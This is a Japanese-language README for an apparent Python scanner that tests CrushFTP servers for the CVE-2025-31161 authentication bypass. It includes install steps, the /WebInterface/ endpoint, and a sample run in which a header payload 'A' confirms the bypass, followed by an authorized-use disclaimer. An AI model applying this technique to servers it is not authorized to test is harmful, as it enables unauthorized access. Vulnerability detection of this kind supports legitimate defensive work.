
ターゲットをスキャンしてCVE-2025-31161に対して脆弱かどうかを確認します
CrushFTPサーバーにおけるCVE-2025-31161脆弱性を検出・テストするPythonツール。
このスクリプトは、CrushFTPサーバーの認証バイパス脆弱性(CVE-2025-31161)をテストします。この脆弱性により、リモート攻撃者はHTTP Authorizationヘッダーの操作を介して有効な認証情報なしで認証を行うことができます。
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
ターゲットIPアドレスを入力: 192.168.1.100
ターゲットポートを入力 [8080]: 8080
==================================================
📡 テスト中: /WebInterface/
🔑 ペイロード: 'A'
📊 ステータス: 200
🎉 脆弱性確認済み
💡 200 OK コンテンツ: dashboard, main
✅ 動作するペイロード: 'A'
==================================================
🎯 ターゲット: 192.168.1.100:8080
🔴 脆弱性ステータス: 脆弱
💥 CVE-2025-31161 認証バイパス確認済み
✅ 動作するペイロード:
==================================================
このツールは教育および許可されたテスト目的のみに使用してください。自分が所有するシステム、または明示的にテスト許可を得たシステムでのみ使用してください。